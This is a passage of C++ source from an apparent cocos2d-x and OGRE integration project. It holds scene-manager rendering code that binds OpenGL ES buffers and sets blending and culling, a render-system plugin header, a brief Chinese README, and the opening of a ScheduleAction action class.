mGpuParamsDirty |= (uint16)GPV_PER_OBJECT;
if (!mSuppressRenderStateChanges)
{
bool passSurfaceAndLightParams = true;
if (pass->isProgrammable())
{
// Tell auto params object about the renderable change
mAutoParamDataSource->setCurrentRenderable(rend);
// Tell auto params object about the world matrices, eliminated query from renderable again
mAutoParamDataSource->setWorldMatrices(mTempXform, numMatrices);
if (vprog)
{
passSurfaceAndLightParams = vprog->getPassSurfaceAndLightStates();
}
}
// Reissue any texture gen settings which are dependent on view matrix
Pass::ConstTextureUnitStateIterator texIter = pass->getTextureUnitStateIterator();
size_t unit = 0;
while (texIter.hasMoreElements())
{
TextureUnitState* pTex = texIter.getNext();
if (pTex->hasViewRelativeTextureCoordinateGeneration())
{
mDestRenderSystem->_setTextureUnitSettings(unit, *pTex);
}
++unit;
}
// Sort out normalisation
// Assume first world matrix representative - shaders that use multiple
// matrices should control renormalisation themselves
if ((pass->getNormaliseNormals() || mNormaliseNormalsOnScale)
&& mTempXform[0].hasScale())
mDestRenderSystem->setNormaliseNormals(true);
else
mDestRenderSystem->setNormaliseNormals(false);
// Sort out negative scaling
// Assume first world matrix representative
if (mFlipCullingOnNegativeScale)
{
CullingMode cullMode = mPassCullingMode;
if (mTempXform[0].hasNegativeScale())
{
switch (mPassCullingMode)
{
case CULL_CLOCKWISE:
cullMode = CULL_ANTICLOCKWISE;
break;
case CULL_ANTICLOCKWISE:
cullMode = CULL_CLOCKWISE;
break;
case CULL_NONE:
break;
};
}
// this also copes with returning from negative scale in previous render op
// for same pass
if (cullMode != mDestRenderSystem->_getCullingMode())
mDestRenderSystem->_setCullingMode(cullMode);
}
// Set up the solid / wireframe override
// Precedence is Camera, Object, Material
// Camera might not override object if not overrideable
PolygonMode reqMode = pass->getPolygonMode();
if (pass->getPolygonModeOverrideable() && rend->getPolygonModeOverrideable())
{
PolygonMode camPolyMode = mCameraInProgress->getPolygonMode();
// check camera detial only when render detail is overridable
if (reqMode > camPolyMode)
{
// only downgrade detail; if cam says wireframe we don't go up to solid
reqMode = camPolyMode;
}
}
mDestRenderSystem->_setPolygonMode(reqMode);
// no automatic light processing
{
// Even if manually driving lights, check light type passes
bool skipBecauseOfLightType = false;
if (pass->getRunOnlyForOneLightType())
{
if (!manualLightList ||
(manualLightList->size() == 1 &&
manualLightList->at(0)->getType() != pass->getOnlyLightType()))
{
skipBecauseOfLightType = true;
}
}
if (!skipBecauseOfLightType)
{
fireRenderSingleObject(rend, pass, mAutoParamDataSource, manualLightList, mSuppressRenderStateChanges);
// Do we need to update GPU program parameters?
if (pass->isProgrammable())
{
// Do we have a manual light list?
if (manualLightList)
{
useLightsGpuProgram(pass, manualLightList);
}
}
// Use manual lights if present, and not using vertex programs that don't use fixed pipeline
if (manualLightList &&
pass->getLightingEnabled() && passSurfaceAndLightParams)
{
useLights(*manualLightList, pass->getMaxSimultaneousLights());
}
// optional light scissoring
ClipResult scissored = CLIPPED_NONE;
ClipResult clipped = CLIPPED_NONE;
if (lightScissoringClipping && manualLightList && pass->getLightScissoringEnabled())
{
scissored = buildAndSetScissor(*manualLightList, mCameraInProgress);
}
if (lightScissoringClipping && manualLightList && pass->getLightClipPlanesEnabled())
{
clipped = buildAndSetLightClip(*manualLightList);
}
// don't bother rendering if clipped / scissored entirely
if (scissored != CLIPPED_ALL && clipped != CLIPPED_ALL)
{
// issue the render op
// nfz: set up multipass rendering
mDestRenderSystem->setCurrentPassIterationCount(pass->getPassIterationCount());
// Finalise GPU parameter bindings
updateGpuProgramParameters(pass);
if (rend->preRender(this, mDestRenderSystem))
{
mDestRenderSystem->_render(ro);
}
rend->postRender(this, mDestRenderSystem);
}
if (scissored == CLIPPED_SOME)
resetScissor();
if (clipped == CLIPPED_SOME)
resetLightClip();
} // !skipBecauseOfLightType
}
}
else // mSuppressRenderStateChanges
{
fireRenderSingleObject(rend, pass, mAutoParamDataSource, NULL, mSuppressRenderStateChanges);
// Just render
mDestRenderSystem->setCurrentPassIterationCount(1);
if (rend->preRender(this, mDestRenderSystem))
mDestRenderSystem->_render(ro);
rend->postRender(this, mDestRenderSystem);
}
// Reset view / projection changes if any
resetViewProjMode(passTransformState);
OgreProfileEndGPUEvent("Material: " + pass->getParent()->getParent()->getName());
}
//-----------------------------------------------------------------------
void BridgeSceneManager::renderSingleObject(Renderable* rend, const Pass* pass,
bool lightScissoringClipping, bool doLightIteration,
const LightList* manualLightList)
{
unsigned short numMatrices;
RenderOperation ro;
OgreProfileBeginGPUEvent("Material: " + pass->getParent()->getParent()->getName());
// Set up rendering operation
// I know, I know, const_cast is nasty but otherwise it requires all internal
// state of the Renderable assigned to the rop to be mutable
const_cast<Renderable*>(rend)->getRenderOperation(ro);
ro.srcRenderable = rend;
GpuProgram* vprog = pass->hasVertexProgram() ? pass->getVertexProgram().get() : 0;
bool passTransformState = true;
if (vprog)
{
passTransformState = vprog->getPassTransformStates();
}
// Set world transformation
numMatrices = rend->getNumWorldTransforms();
if (numMatrices > 0)
{
rend->getWorldTransforms(mTempXform);
if (mCameraRelativeRendering && !rend->getUseIdentityView())
{
for (unsigned short i = 0; i < numMatrices; ++i)
{
mTempXform[i].setTrans(mTempXform[i].getTrans() - mCameraRelativePosition);
}
}
if (passTransformState)
{
if (numMatrices > 1)
{
mDestRenderSystem->_setWorldMatrices(mTempXform, numMatrices);
}
else
{
mDestRenderSystem->_setWorldMatrix(*mTempXform);
}
if (mShaderProgram)
{
mShaderProgram->use();
mShaderProgram->setUniformsForBuiltins(*((cocos2d::Mat4*)mTempXform));// rend->getCocosMatrix4()));
}
}
}
// Issue view / projection changes if any
useRenderableViewProjMode(rend, passTransformState);
// mark per-object params as dirty
mGpuParamsDirty |= (uint16)GPV_PER_OBJECT;
if (!mSuppressRenderStateChanges)
{
bool passSurfaceAndLightParams = true;
if (pass->isProgrammable())
{
// Tell auto params object about the renderable change
mAutoParamDataSource->setCurrentRenderable(rend);
// Tell auto params object about the world matrices, eliminated query from renderable again
mAutoParamDataSource->setWorldMatrices(mTempXform, numMatrices);
if (vprog)
{
passSurfaceAndLightParams = vprog->getPassSurfaceAndLightStates();
}
}
// Reissue any texture gen settings which are dependent on view matrix
Pass::ConstTextureUnitStateIterator texIter = pass->getTextureUnitStateIterator();
size_t unit = 0;
while (texIter.hasMoreElements())
{
TextureUnitState* pTex = texIter.getNext();
if (pTex->hasViewRelativeTextureCoordinateGeneration())
{
mDestRenderSystem->_setTextureUnitSettings(unit, *pTex);
}
++unit;
}
// Sort out normalisation
// Assume first world matrix representative - shaders that use multiple
// matrices should control renormalisation themselves
if ((pass->getNormaliseNormals() || mNormaliseNormalsOnScale)
&& mTempXform[0].hasScale())
mDestRenderSystem->setNormaliseNormals(true);
else
mDestRenderSystem->setNormaliseNormals(false);
// Sort out negative scaling
// Assume first world matrix representative
if (mFlipCullingOnNegativeScale)
{
CullingMode cullMode = mPassCullingMode;
if (mTempXform[0].hasNegativeScale())
{
switch (mPassCullingMode)
{
case CULL_CLOCKWISE:
cullMode = CULL_ANTICLOCKWISE;
break;
case CULL_ANTICLOCKWISE:
cullMode = CULL_CLOCKWISE;
break;
case CULL_NONE:
break;
};
}
// this also copes with returning from negative scale in previous render op
// for same pass
if (cullMode != mDestRenderSystem->_getCullingMode())
mDestRenderSystem->_setCullingMode(cullMode);
}
// Set up the solid / wireframe override
// Precedence is Camera, Object, Material
// Camera might not override object if not overrideable
PolygonMode reqMode = pass->getPolygonMode();
if (pass->getPolygonModeOverrideable() && rend->getPolygonModeOverrideable())
{
PolygonMode camPolyMode = mCameraInProgress->getPolygonMode();
// check camera detial only when render detail is overridable
if (reqMode > camPolyMode)
{
// only downgrade detail; if cam says wireframe we don't go up to solid
reqMode = camPolyMode;
}
}
mDestRenderSystem->_setPolygonMode(reqMode);
// no automatic light processing
{
// Even if manually driving lights, check light type passes
bool skipBecauseOfLightType = false;
if (pass->getRunOnlyForOneLightType())
{
if (!manualLightList ||
(manualLightList->size() == 1 &&
manualLightList->at(0)->getType() != pass->getOnlyLightType()))
{
skipBecauseOfLightType = true;
}
}
if (!skipBecauseOfLightType)
{
fireRenderSingleObject(rend, pass, mAutoParamDataSource, manualLightList, mSuppressRenderStateChanges);
// Do we need to update GPU program parameters?
if (pass->isProgrammable())
{
// Do we have a manual light list?
if (manualLightList)
{
useLightsGpuProgram(pass, manualLightList);
}
}
// Use manual lights if present, and not using vertex programs that don't use fixed pipeline
if (manualLightList &&
pass->getLightingEnabled() && passSurfaceAndLightParams)
{
useLights(*manualLightList, pass->getMaxSimultaneousLights());
}
// optional light scissoring
ClipResult scissored = CLIPPED_NONE;
ClipResult clipped = CLIPPED_NONE;
if (lightScissoringClipping && manualLightList && pass->getLightScissoringEnabled())
{
scissored = buildAndSetScissor(*manualLightList, mCameraInProgress);
}
if (lightScissoringClipping && manualLightList && pass->getLightClipPlanesEnabled())
{
clipped = buildAndSetLightClip(*manualLightList);
}
// don't bother rendering if clipped / scissored entirely
if (scissored != CLIPPED_ALL && clipped != CLIPPED_ALL)
{
// issue the render op
// nfz: set up multipass rendering
mDestRenderSystem->setCurrentPassIterationCount(pass->getPassIterationCount());
// Finalise GPU parameter bindings
updateGpuProgramParameters(pass);
if (rend->preRender(this, mDestRenderSystem))
{
//mDestRenderSystem->_render(ro);
void* pBufferData = 0;
const VertexDeclaration::VertexElementList& decl =
ro.vertexData->vertexDeclaration->getElements();
VertexDeclaration::VertexElementList::const_iterator elem, elemEnd;
elemEnd = decl.end();
for (elem = decl.begin(); elem != elemEnd; ++elem)
{
if (!ro.vertexData->vertexBufferBinding->isBufferBound(elem->getSource()))
continue; // skip unbound elements
CHECK_GL_ERROR_DEBUG();;
HardwareVertexBufferSharedPtr vertexBuffer =
ro.vertexData->vertexBufferBinding->getBuffer(elem->getSource());
GLuint bufferId = static_cast<const BridgeHardwareVertexBuffer*>(vertexBuffer.get())->getGLBufferId();
glBindBuffer(GL_ARRAY_BUFFER, bufferId);
//_bindGLBuffer(GL_ARRAY_BUFFER,bufferId);
pBufferData = ((char *)NULL + (elem->getOffset())) ;
if (ro.vertexData->vertexStart)
{
pBufferData = static_cast<char*>(pBufferData)+ro.vertexData->vertexStart * vertexBuffer->getVertexSize();
}
VertexElementSemantic sem = elem->getSemantic();
unsigned short typeCount = VertexElement::getTypeCount(elem->getType());
GLboolean normalised = GL_FALSE;
bool multitexturing = false;//(getCapabilities()->getNumTextureUnits() > 1);
bool isCustomAttrib = false;
GLuint attrib = 0;
switch (elem->getType())
{
case VET_COLOUR:
case VET_COLOUR_ABGR:
case VET_COLOUR_ARGB:
// Because GL takes these as a sequence of single unsigned bytes, count needs to be 4
// VertexElement::getTypeCount treats them as 1 (RGBA)
// Also need to normalise the fixed-point data
typeCount = 4;
normalised = GL_TRUE;
break;
default:
break;
};
if (!isCustomAttrib)
{
// fixed-function & builtin attribute support
switch (sem)
{
case VES_POSITION:
attrib = 0;
break;
//case VES_NORMAL:
// break;
case VES_DIFFUSE:
attrib = 1;
break;
//case VES_SPECULAR:
// break;
case VES_TEXTURE_COORDINATES:
attrib = 2;
break;
default:
attrib = 12;
break;
};
}
int type = GLES2HardwareBufferManager::getGLType(elem->getType());
GLsizei size = static_cast<GLsizei>(vertexBuffer->getVertexSize());
CHECK_GL_ERROR_DEBUG();
glVertexAttribPointer(attrib,
typeCount,
type,
normalised,
size,
pBufferData);
CHECK_GL_ERROR_DEBUG();;
}
// Find the correct type to render
GLint primType;
switch (ro.operationType)
{
case RenderOperation::OT_POINT_LIST:
primType = GL_POINTS;
break;
case RenderOperation::OT_LINE_LIST:
primType = GL_LINES;
break;
case RenderOperation::OT_LINE_STRIP:
primType = GL_LINE_STRIP;
break;
default:
case RenderOperation::OT_TRIANGLE_LIST:
primType = GL_TRIANGLES;
break;
case RenderOperation::OT_TRIANGLE_STRIP:
primType = GL_TRIANGLE_STRIP;
break;
case RenderOperation::OT_TRIANGLE_FAN:
primType = GL_TRIANGLE_FAN;
break;
}
if (ro.useIndexes)
{
GLuint bufferId = static_cast<GLES2HardwareIndexBuffer*>(ro.indexData->indexBuffer.get())->getGLBufferId();
glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, bufferId);
pBufferData =((char *)NULL + (ro.indexData->indexStart *
ro.indexData->indexBuffer->getIndexSize())) ;
GLenum indexType = (ro.indexData->indexBuffer->getType() == HardwareIndexBuffer::IT_16BIT) ? GL_UNSIGNED_SHORT : GL_UNSIGNED_INT;
// Update derived depth bias
CHECK_GL_ERROR_DEBUG();;
GLenum primitive = primType ;
glDrawElements(primitive, ro.indexData->indexCount, indexType, pBufferData);
CHECK_GL_ERROR_DEBUG();;
}
}
rend->postRender(this, mDestRenderSystem);
}
if (scissored == CLIPPED_SOME)
resetScissor();
if (clipped == CLIPPED_SOME)
resetLightClip();
} // !skipBecauseOfLightType
}
}
else // mSuppressRenderStateChanges
{
fireRenderSingleObject(rend, pass, mAutoParamDataSource, NULL, mSuppressRenderStateChanges);
// Just render
mDestRenderSystem->setCurrentPassIterationCount(1);
if (rend->preRender(this, mDestRenderSystem))
{
mDestRenderSystem->_render(ro);
}
rend->postRender(this, mDestRenderSystem);
}
// Reset view / projection changes if any
resetViewProjMode(passTransformState);
OgreProfileEndGPUEvent("Material: " + pass->getParent()->getParent()->getName());
}
void BridgeSceneManager::_render11()
{
return ;
if (mShaderProgram && mRenderQueue)
{
mShaderProgram->use();
auto getBlend = [](int ogreBlend)
{
switch (ogreBlend)
{
case SBF_ONE:
return GL_ONE;
case SBF_ZERO:
return GL_ZERO;
case SBF_DEST_COLOUR:
return GL_DST_COLOR;
case SBF_SOURCE_COLOUR:
return GL_SRC_COLOR;
case SBF_ONE_MINUS_DEST_COLOUR:
return GL_ONE_MINUS_DST_COLOR;
case SBF_ONE_MINUS_SOURCE_COLOUR:
return GL_ONE_MINUS_SRC_COLOR;
case SBF_DEST_ALPHA:
return GL_DST_ALPHA;
case SBF_SOURCE_ALPHA:
return GL_SRC_ALPHA;
case SBF_ONE_MINUS_DEST_ALPHA:
return GL_ONE_MINUS_DST_ALPHA;
case SBF_ONE_MINUS_SOURCE_ALPHA:
return GL_ONE_MINUS_SRC_ALPHA;
};
return GL_ONE;
};
for(auto obj : mBridgeRenderQueue->mTransparentRenderable)
{
// Give SM a chance to eliminate
GLenum sourceBlend = getBlend(obj.pass->getSourceBlendFactor());
GLenum destBlend = getBlend(obj.pass->getDestBlendFactor());
const Pass *pass = obj.pass;
Renderable *rend = obj.renderable;
CHECK_GL_ERROR_DEBUG();;
if(pass->getSourceBlendFactor() == SBF_ONE && pass->getDestBlendFactor() == SBF_ZERO)
{
glDisable(GL_BLEND);
CHECK_GL_ERROR_DEBUG();;
}
else
{
glEnable(GL_BLEND);
CHECK_GL_ERROR_DEBUG();;
glBlendFunc(sourceBlend, destBlend);
CHECK_GL_ERROR_DEBUG();;
}
GLint func = GL_FUNC_ADD;
switch(pass->getSceneBlendingOperation())
{
case SBO_ADD:
func = GL_FUNC_ADD;
break;
case SBO_SUBTRACT:
func = GL_FUNC_SUBTRACT;
break;
case SBO_REVERSE_SUBTRACT:
func = GL_FUNC_REVERSE_SUBTRACT;
break;
case SBO_MIN:
#if GL_EXT_blend_minmax
func = GL_MIN_EXT;
#endif
break;
case SBO_MAX:
#if GL_EXT_blend_minmax
func = GL_MAX_EXT;
#endif
break;
}
glBlendEquation(func);
CHECK_GL_ERROR_DEBUG();;
Pass::ConstTextureUnitStateIterator texIter = pass->getTextureUnitStateIterator();
size_t unit = 0;
// Reset the shadow texture index for each pass
while(texIter.hasMoreElements())
{
TextureUnitState* pTex = texIter.getNext();
if (pTex->getContentType() == TextureUnitState::CONTENT_COMPOSITOR)
{
CompositorChain* currentChain = _getActiveCompositorChain();
if (!currentChain)
{
OGRE_EXCEPT(Exception::ERR_INVALID_STATE,
"A pass that wishes to reference a compositor texture "
"attempted to render in a pipeline without a compositor",
"SceneManager::_setPass");
}
CompositorInstance* refComp = currentChain->getCompositor(pTex->getReferencedCompositorName());
if (refComp == 0)
{
OGRE_EXCEPT(Exception::ERR_ITEM_NOT_FOUND,
"Invalid compositor content_type compositor name",
"SceneManager::_setPass");
}
Ogre::TexturePtr refTex = refComp->getTextureInstance(
pTex->getReferencedTextureName(), pTex->getReferencedMRTIndex());
if (refTex.isNull())
{
OGRE_EXCEPT(Exception::ERR_ITEM_NOT_FOUND,
"Invalid compositor content_type texture name",
"SceneManager::_setPass");
}
pTex->_setTexturePtr(refTex);
}
//mDestRenderSystem->_setTextureUnitSettings(unit, *pTex);
++unit;
}
// Disable remaining texture units
mDestRenderSystem->_disableTextureUnitsFrom(pass->getNumTextureUnitStates());
// Culling mode
if (isShadowTechniqueTextureBased()
&& mIlluminationStage == IRS_RENDER_TO_TEXTURE
&& mShadowCasterRenderBackFaces
&& pass->getCullingMode() == CULL_CLOCKWISE)
{
// render back faces into shadow caster, can help with depth comparison
mPassCullingMode = CULL_ANTICLOCKWISE;
}
else
{
mPassCullingMode = pass->getCullingMode();
}
//mDestRenderSystem->_setCullingMode(mPassCullingMode);
GLenum cullMode;
switch( mPassCullingMode )
{
case CULL_NONE:
glDisable(GL_CULL_FACE);
CHECK_GL_ERROR_DEBUG();;
default:
case CULL_CLOCKWISE:
cullMode = GL_BACK;
break;
case CULL_ANTICLOCKWISE:
cullMode = GL_BACK;
break;
}
glEnable(GL_CULL_FACE);
CHECK_GL_ERROR_DEBUG();;
glCullFace(cullMode);
CHECK_GL_ERROR_DEBUG();;
GLenum mPolygonMode;
switch(pass->getPolygonMode())
{
case PM_POINTS:
mPolygonMode = GL_POINTS;
break;
case PM_WIREFRAME:
mPolygonMode = GL_LINE_STRIP;
break;
default:
case PM_SOLID:
mPolygonMode = GL_FILL;
break;
}
//==================renderSingleObject(obj.renderable,obj.pass,true,true,NULL);
auto glProgram =cocos2d::GLProgramCache::getInstance()->getGLProgram(cocos2d::GLProgram::SHADER_NAME_POSITION_TEXTURE_COLOR);
auto programstate = cocos2d::GLProgramState::create(glProgram);
//this->setGLProgram(GLProgramCache::getInstance()->getGLProgram(GLProgram::SHADER_NAME_POSITION_TEXTURE_COLOR));
unsigned short numMatrices;
RenderOperation ro;
OgreProfileBeginGPUEvent("Material: " + pass->getParent()->getParent()->getName());
// Set up rendering operation
// I know, I know, const_cast is nasty but otherwise it requires all internal
// state of the Renderable assigned to the rop to be mutable
const_cast<Renderable*>(rend)->getRenderOperation(ro);
ro.srcRenderable = rend;
GpuProgram* vprog = pass->hasVertexProgram() ? pass->getVertexProgram().get() : 0;
bool passTransformState = true;
if (vprog)
{
passTransformState = vprog->getPassTransformStates();
}
// Set world transformation
numMatrices = rend->getNumWorldTransforms();
if (numMatrices > 0)
{
rend->getWorldTransforms(mTempXform);
if (mCameraRelativeRendering && !rend->getUseIdentityView())
{
for (unsigned short i = 0; i < numMatrices; ++i)
{
mTempXform[i].setTrans(mTempXform[i].getTrans() - mCameraRelativePosition);
}
}
if (passTransformState)
{
if (numMatrices > 1)
{
mDestRenderSystem->_setWorldMatrices(mTempXform, numMatrices);
}
else
{
mDestRenderSystem->_setWorldMatrix(*mTempXform);
}
}
if (mShaderProgram)
{
mShaderProgram->use();
//mShaderProgram->setUniformsForBuiltins(*((cocos2d::Mat4*)mTempXform));// rend->getCocosMatrix4()));
}
}
// Issue view / projection changes if any
useRenderableViewProjMode(rend, passTransformState);
// mark per-object params as dirty
mGpuParamsDirty |= (uint16)GPV_PER_OBJECT;
int cctextureId;
if (!mSuppressRenderStateChanges)
{
bool passSurfaceAndLightParams = true;
// Reissue any texture gen settings which are dependent on view matrix
Pass::ConstTextureUnitStateIterator texIter = pass->getTextureUnitStateIterator();
size_t unit = 0;
while (texIter.hasMoreElements())
{
TextureUnitState* pTex = texIter.getNext();
mDestRenderSystem->_setTextureUnitSettings(unit, *pTex);
if (pTex->hasViewRelativeTextureCoordinateGeneration())
{
// mDestRenderSystem->_setTextureUnitSettings(unit, *pTex);
}
++unit;
GLES2BridgeTexture tex = pTex->_getTexturePtr();
cctextureId = tex->getGLID();
glBindTexture(GL_TEXTURE_2D, cctextureId);
}
// Sort out normalisation
// Assume first world matrix representative - shaders that use multiple
// matrices should control renormalisation themselves
if ((pass->getNormaliseNormals() || mNormaliseNormalsOnScale)
&& mTempXform[0].hasScale())
mDestRenderSystem->setNormaliseNormals(true);
else
mDestRenderSystem->setNormaliseNormals(false);
// Sort out negative scaling
// Assume first world matrix representative
if (mFlipCullingOnNegativeScale)
{
CullingMode cullMode = mPassCullingMode;
if (mTempXform[0].hasNegativeScale())
{
switch (mPassCullingMode)
{
case CULL_CLOCKWISE:
cullMode = CULL_ANTICLOCKWISE;
break;
case CULL_ANTICLOCKWISE:
cullMode = CULL_CLOCKWISE;
break;
case CULL_NONE:
break;
};
}
// this also copes with returning from negative scale in previous render op
// for same pass
if (cullMode != mDestRenderSystem->_getCullingMode())
mDestRenderSystem->_setCullingMode(cullMode);
}
// Set up the solid / wireframe override
// Precedence is Camera, Object, Material
// Camera might not override object if not overrideable
PolygonMode reqMode = pass->getPolygonMode();
if (pass->getPolygonModeOverrideable() && rend->getPolygonModeOverrideable())
{
PolygonMode camPolyMode = mCameraInProgress->getPolygonMode();
// check camera detial only when render detail is overridable
if (reqMode > camPolyMode)
{
// only downgrade detail; if cam says wireframe we don't go up to solid
reqMode = camPolyMode;
}
}
mDestRenderSystem->_setPolygonMode(reqMode);
// optional light scissoring
ClipResult scissored = CLIPPED_NONE;
ClipResult clipped = CLIPPED_NONE;
if (rend->preRender(this, mDestRenderSystem))
{
//mDestRenderSystem->_render(ro);
void* pBufferData = 0;
const VertexDeclaration::VertexElementList& decl =
ro.vertexData->vertexDeclaration->getElements();
VertexDeclaration::VertexElementList::const_iterator elem, elemEnd;
elemEnd = decl.end();
for (elem = decl.begin(); elem != elemEnd; ++elem)
{
if (!ro.vertexData->vertexBufferBinding->isBufferBound(elem->getSource()))
continue; // skip unbound elements
CHECK_GL_ERROR_DEBUG();;
HardwareVertexBufferSharedPtr vertexBuffer =
ro.vertexData->vertexBufferBinding->getBuffer(elem->getSource());
GLuint bufferId = static_cast<const BridgeHardwareVertexBuffer*>(vertexBuffer.get())->getGLBufferId();
glBindBuffer(GL_ARRAY_BUFFER, bufferId);
//_bindGLBuffer(GL_ARRAY_BUFFER,bufferId);
pBufferData = ((char *)NULL + (elem->getOffset())) ;
if (ro.vertexData->vertexStart)
{
pBufferData = static_cast<char*>(pBufferData)+ro.vertexData->vertexStart * vertexBuffer->getVertexSize();
}
VertexElementSemantic sem = elem->getSemantic();
unsigned short typeCount = VertexElement::getTypeCount(elem->getType());
GLboolean normalised = GL_FALSE;
bool multitexturing = false;//(getCapabilities()->getNumTextureUnits() > 1);
bool isCustomAttrib = false;
GLuint attrib = 0;
switch (elem->getType())
{
case VET_COLOUR:
case VET_COLOUR_ABGR:
case VET_COLOUR_ARGB:
// Because GL takes these as a sequence of single unsigned bytes, count needs to be 4
// VertexElement::getTypeCount treats them as 1 (RGBA)
// Also need to normalise the fixed-point data
typeCount = 4;
normalised = GL_TRUE;
break;
default:
break;
};
std::string key;
if (!isCustomAttrib)
{
// fixed-function & builtin attribute support
switch (sem)
{
case VES_POSITION:
attrib = 0;
key = GLProgram::ATTRIBUTE_NAME_POSITION;
break;
//case VES_NORMAL:
// break;
case VES_DIFFUSE:
attrib = 1;
key = GLProgram::ATTRIBUTE_NAME_COLOR;
break;
//case VES_SPECULAR:
// break;
case VES_TEXTURE_COORDINATES:
attrib = 2;
key = GLProgram::ATTRIBUTE_NAME_TEX_COORD;
break;
default:
attrib = 12;
break;
};
}
int type = GLES2HardwareBufferManager::getGLType(elem->getType());
GLsizei size = static_cast<GLsizei>(vertexBuffer->getVertexSize());
programstate->setVertexAttribPointer(key,
typeCount,
type,
normalised,
size,
(GLvoid*)pBufferData
);
}
// Find the correct type to render
GLint primType;
switch (ro.operationType)
{
case RenderOperation::OT_POINT_LIST:
primType = GL_POINTS;
break;
case RenderOperation::OT_LINE_LIST:
primType = GL_LINES;
break;
case RenderOperation::OT_LINE_STRIP:
primType = GL_LINE_STRIP;
break;
default:
case RenderOperation::OT_TRIANGLE_LIST:
primType = GL_TRIANGLES;
break;
case RenderOperation::OT_TRIANGLE_STRIP:
primType = GL_TRIANGLE_STRIP;
break;
case RenderOperation::OT_TRIANGLE_FAN:
primType = GL_TRIANGLE_FAN;
break;
}
if (ro.useIndexes)
{
GLuint bufferId = static_cast<GLES2HardwareIndexBuffer*>(ro.indexData->indexBuffer.get())->getGLBufferId();
//glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, bufferId);
pBufferData =((char *)NULL + (ro.indexData->indexStart *
ro.indexData->indexBuffer->getIndexSize())) ;
GLenum indexType = (ro.indexData->indexBuffer->getType() == HardwareIndexBuffer::IT_16BIT) ? GL_UNSIGNED_SHORT : GL_UNSIGNED_INT;
CHECK_GL_ERROR_DEBUG();;
GLenum primitive = primType ;
//glDrawElements(primitive, ro.indexData->indexCount, indexType, pBufferData);
CHECK_GL_ERROR_DEBUG();;
programstate->applyGLProgram(*((cocos2d::Mat4*)mTempXform));
programstate->applyUniforms();
programstate->applyAttributes();
glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, bufferId);
glDrawElements(primitive, ro.indexData->indexCount, indexType,pBufferData);
CHECK_GL_ERROR_DEBUG();
glBindBuffer(GL_ARRAY_BUFFER, 0);
glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, 0);
CC_INCREMENT_GL_DRAWN_BATCHES_AND_VERTICES(1, 6);
CHECK_GL_ERROR_DEBUG();
// Update derived depth bias
}
}
rend->postRender(this, mDestRenderSystem);
}
// !skipBecauseOfLightType
}
}
}*/
<file_sep>#ifndef OGRE_BRIDGE_RENDERSYSTEM_Plugin_H
#define OGRE_BRIDGE_RENDERSYSTEM_Plugin_H
#include "OgrePlugin.h"
namespace Ogre
{
class BridgeRenderSystem;
}
namespace Ogre
{
class BridgeRenderSystemPlugin : public Plugin
{
public:
BridgeRenderSystemPlugin();
const String& getName() const;
void install();
void uninstall();
void initialise();
void shutdown();
private:
BridgeRenderSystem *mRenderSystem;
};
}
#endif //OGRE_BRIDGE_RENDERSYSTEM_Plugin_H<file_sep>
cocos2d-x-ogre
=========
| |iOS|Mac|Linux|Win32|Android|Win8.1-Universal|
| ----|----|----- | ---|----|------|---|
[cocos2d-x-ogre] 基于cocos2dx[1]的早期版本,以插件的形式引入ogre的核心库,使用cocos的纹理以及渲染,支持Particle Universe粒子系统,对于ogre项目移植有借鉴作用,由于项目支持原因,没有继续完善,现开放代码仅。
cocos2d-x-ogre 目录:
OGRE的支持库:
cocos2dx-ogre\cocos2d\third_party
OGRE的控件使用封装:
cocos-x-ogre\cocos2d\encapsulation\ogre
工程本身为标准cocos工程,编译过程和cocos项目一致
[1]: http://www.cocos2d-x.org "cocos2d-x"
[2]: http://www.cocos2d-iphone.org "cocos2d for iPhone"
[3]: http://www.cocos2d-x.org/projects/cocos2d-x/wiki/Download
[4]: http://www.cocos2d-x.org/download/version#Cocos2d-x
[5]: http://www.box2d.org "Box2D"
[6]: http://www.chipmunk-physics.net "Chipmunk2D"
[7]: http://esotericsoftware.com/ "http://esotericsoftware.com/"
[8]: https://github.com/cocos2d/cocos2d-x/blob/v3/docs/CONTRIBUTE.md
[9]: http://forum.cocos2d-x.org "http://forum.cocos2d-x.org"
[10]: http://www.twitter.com/cocos2dx "http://www.twitter.com/cocos2dx"
[11]: http://t.sina.com.cn/cocos2dx "http://t.sina.com.cn/cocos2dx"
[12]: https://webchat.freenode.net/ "https://webchat.freenode.net/"
<file_sep>/****************************************************************************
Copyright (c) 2014 Chukong Technologies Inc.
http://www.cocos2d-x.org
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
****************************************************************************/
#include "ScheduleAction.h"
#include "base/CCDirector.h"
#include "2d/CCCamera.h"
#include "renderer/CCRenderer.h"
#include "renderer/CCGLProgramCache.h"
#include "extension/ScriptCallFuncHelper.h"
NS_CC_BEGIN
//
// DelayTime
//
ScheduleAction* ScheduleAction::create(float d,ScriptCallFuncHelper *helper)
{
ScheduleAction* action = new (std::nothrow) ScheduleAction();
action->initWithAction(d,helper);
action->autorelease();
return action;
}
bool ScheduleAction::initWithAction(float d,ScriptCallFuncHelper *helper)
{
CCASSERT(helper != nullptr, "");
CCASSERT(helper != mScriptHelper, "");
if (ActionInterval::initWithDuration(d))
{
// Don't leak if action is reused
CC_SAFE_RELEASE(mScriptHelper);
mScriptHelper = helper;
mScriptHelper->retain();
return true;
}
return false;
}
ScheduleAction* ScheduleAction::clone() const
{
// no copy constructor
auto a = new (std::nothrow) ScheduleAction();
a->initWithAction(_duration,mScriptHelper);
a->autorelease();
return a;
}
void ScheduleAction::update(float time)
{
if(mScriptHelper)
{
